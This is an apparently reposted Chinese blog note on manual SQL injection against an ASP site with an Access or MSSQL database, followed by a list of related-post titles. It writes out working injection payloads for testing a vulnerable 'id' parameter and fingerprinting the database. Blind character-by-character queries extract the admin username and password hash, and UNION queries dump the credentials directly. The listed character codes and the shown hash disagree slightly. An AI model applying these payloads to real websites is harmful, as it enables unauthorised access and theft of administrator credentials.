http://www.xxx.com/news.asp?id=6
注入点
判断是否存在注入 两次返回不一样 存在注入
http://www.xxx.com/news.asp?id=6 and 1=1
http://www.xxx.com/news.asp?id=6 and 1=2
判断数据库 这里可能是本地问题 没有测试出来
and (select count(*) from msysobjects)>0  (返回权限不足access数据库)
and (select count(*) from sysobjects)>0   (返回正常则为MSSQL数据库)

猜解表名(正常则存在admin,不正常则不存在)
and exists (select * from admin)
返回正确 存在admin 我们随便填写一个进去那么 返回错误 不存在这个表

现在我们来猜解字段
and exists (select username from admin)
and exists (select password from admin)
没有出错证明这两个字段都是存在 不存在的话同上 不存在字段

猜解用户名和密码长度
and (select top 1 len(username) from admin)>0
and (select top 1 len(password) from admin)>0
猜解用户名和密码内容:
and(select top 1 asc(mid(username,1,1))from admin)>97
and(select top 1 asc(mid(username,1,1))from admin)=97 
and(select top 1 asc(mid(username,2,1))from admin)=100
and(select top 1 asc(mid(username,3,1))from admin)=109
and(select top 1 asc(mid(username,4,1))from admin)=105
and(select top 1 asc(mid(username,5,1))from admin)=110
97 100 109 105 110 admin
------------------------------------------------------
and(select top 1 asc(mid(password,1,1))from admin)=52
and(select top 1 asc(mid(password,2,1))from admin)=54
and(select top 1 asc(mid(password,3,1))from admin)=57
and(select top 1 asc(mid(password,4,1))from admin)=56
and(select top 1 asc(mid(password,5,1))from admin)=48
and(select top 1 asc(mid(password,6,1))from admin)=100
and(select top 1 asc(mid(password,7,1))from admin)=51
and(select top 1 asc(mid(password,8,1))from admin)=50
and(select top 1 asc(mid(password,9,1))from admin)=99
and(select top 1 asc(mid(password,10,1))from admin)=48
and(select top 1 asc(mid(password,11,1))from admin)=53
and(select top 1 asc(mid(password,12,1))from admin)=53
and(select top 1 asc(mid(password,13,1))from admin)=57
and(select top 1 asc(mid(password,14,1))from admin)=102
and(select top 1 asc(mid(password,15,1))from admin)=56
and(select top 1 asc(mid(password,16,1))from admin)=32
52 54 57 101 56 48 100 51 50 99 48 53 53 57 102 56 32
469e80d32c0559f8 md5 解出来的密码是admin888
=====================================================
(二)联合查询暴出管理帐号及密码
先用order by 爆出字段数,然后:
http://www.xxx.com/news.asp?id=6 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 from admin
语法:1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 表示的是列长度。
from admin 查询对像admin表名
运行后会出现两到三个数字,如:4、12 则修改语句子(即在4、12中修改成列名,红色部份):
http://www.xxx.com/news.asp?id=6 and 1=2 union select 1,2,3,usermane,5,6,7,8,9,10,11,password,13,14,15 from admin
这样,就可以爆出管理帐户和密码了。当然你也可以先爆帐户:
http://www.xxx.com/news.asp?id=6 and 1=2 union select 1,2,3,username,5,6,7,8,9,10,11,12,13,14,15 from admin
再爆密码:
http://www.xxx.com/news.asp?id=6 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,password,15 from admin

转载于:https://www.cnblogs.com/secbook/archive/2012/07/23/2654864.html

access手工注入笔记相关推荐

  1. Access手工注入

    access手工注入 哈哈哈哈,,,我顾北清又回来啦,接着更新. 实验环境:win2008R2虚拟机,物理机(也就是我的win10). 搭建环境用的是access+asp源码. 环境搭建可以参照这里, ...

  2. ACCESS手工注入学习笔记

                      ACCESS注入 一:判断注入点 '        报错 and 1=1   正确 and 1=2   报错 or 1=1    报错 or 1=2    正确 a ...

  3. Access数据库手工注入

    ACCESS数据库手工注入 access数据库 是一种非常简单但是功能完整的数据库,很适合小型网站创建,可以很轻松管理表和列,有很多管理工具. access数据库结构? access数据库是这么个结构 ...

  4. SQL手工注入网站笔记

    SQL手工注入网站笔记 目标网站:http://testphp.vulnweb.com/listproducts.php?cat=1 1.判断注入点: http://testphp.vulnweb.c ...

  5. 墨者学院刷题笔记——SQL手工注入漏洞测试(MongoDB数据库)

    今天继续给大家介绍Linux运维相关知识,本文主要内容是SQL手工注入漏洞测试(MongoDB数据库). 一.题目简介 我们这里采用墨者学院的MongoDB数据库渗透测试题目,其地址为:https:/ ...

  6. mysql手工注入imformation_网络安全系列之十八 MySQL基本操作(PHP注入基础)

    在之前的博文中曾介绍过如何对ASP网站进行手工注入,ASP网站大都是采用ACCESS或MSSQL数据库,因而所谓针对ASP的SQL注入其实也就是根据ACCESS或MSSQL数据库的特点来构造查询语句. ...

  7. 2012最新网站手工注入详解教程

    想起 苦学技术的梯子真是感慨万千,别人在背英语句子,而卧却在背数据库语句,同样都是英文 ,可为啥咱英语成绩还是不及格--    言归正传,现在sql注入工具可谓层出不穷,但是工具毕竟都是人写的,总会有 ...

  8. mysql 解表_Access MySql之常规手工注入

    (一)1.access注入之联合查询法: 单引号判断 错误页面 And 1=1 正确页面 And 1=2 错误页面 Order by xx 查询字段数目 Order by 22 正确 order by ...

  9. 教程是php手工注入

    大家好,今天给大家带的教程是php手工注入,看了这个教程你会在不用工具的情况下, 拿下一般的php网站!!! 目标网站:http://www.atextile.org.cn:81 注入点:  http ...

最新文章

  1. Codeforces Round #699 (Div. 2) E.Sorting Books(贪心+DP / 线段树)超高质量题解,看不懂来打我 ~
  2. Git 只拉取部分文件
  3. 【Linux】—— /usr/bin/perl 被 MySQL-community-server-8.0.26-1.el7.x86_64 需要,解决方法
  4. [uva]AncientMessages象形文字识别 (dfs求连通块)
  5. mysql错误1300怎么解决_pt-osc 变更时遇到 “MySQL error 1300” 报错问题解决
  6. Linux进程间通信——管道
  7. flume-elasticsearch-sink indexName
  8. 两个时间之间是多少小时_那是两个小时我不会回来
  9. rpn风险等级评价准则_2019一建经济学习重点:技术方案经济效果评价
  10. ajax ssm 页面跳转_SSM框架的面试常见问题
  11. 第58课 百钱买百鸡 《小学生C++趣味编程》
  12. flutter 获取android 还是ios_Flutter完整开发实战详解(二十、 Android PlatformView 和键盘问题)...
  13. unixodbc mysql安装_ubuntu12下安装unixODBC(mysql)
  14. Java-虚拟机-垃圾收集器/垃圾收集算法/GCROOT根
  15. Wet Shark and Two Subsequences
  16. GD32F303串口ISP方式下载程序
  17. 工具类软件操作手册_小规模纳税人开票前完成开票软件升级,关于1%税率的发票...
  18. 中小企业监控体系构建实战--案例分享(内附传送门)
  19. 关于MyBatis框架的总结
  20. English语法_人称代词

热门文章

  1. 猫猫学iOS之小知识iOS启动动画_Launch Screen的运用
  2. yum安装Imagick及扩展
  3. 编辑距离及最小编辑距离算法(转)----动态规划
  4. 《当程序员的那些狗日日子》(五十二)同学情与差距
  5. 外贸单证之信用证审核的18个要点
  6. 阿德:我在去哪儿干了些什么,3个月业绩400%提升
  7. 移动应用如何提升登录转化率
  8. PMCAFF问答精选 | 滴滴跟UBER最主要的区别是什么?
  9. 不服来战!这才是产品汪与程序猿撕逼的正确方式
  10. 【独家】去哪儿网PRD兵法秘籍大公开,火爆课程精彩直击!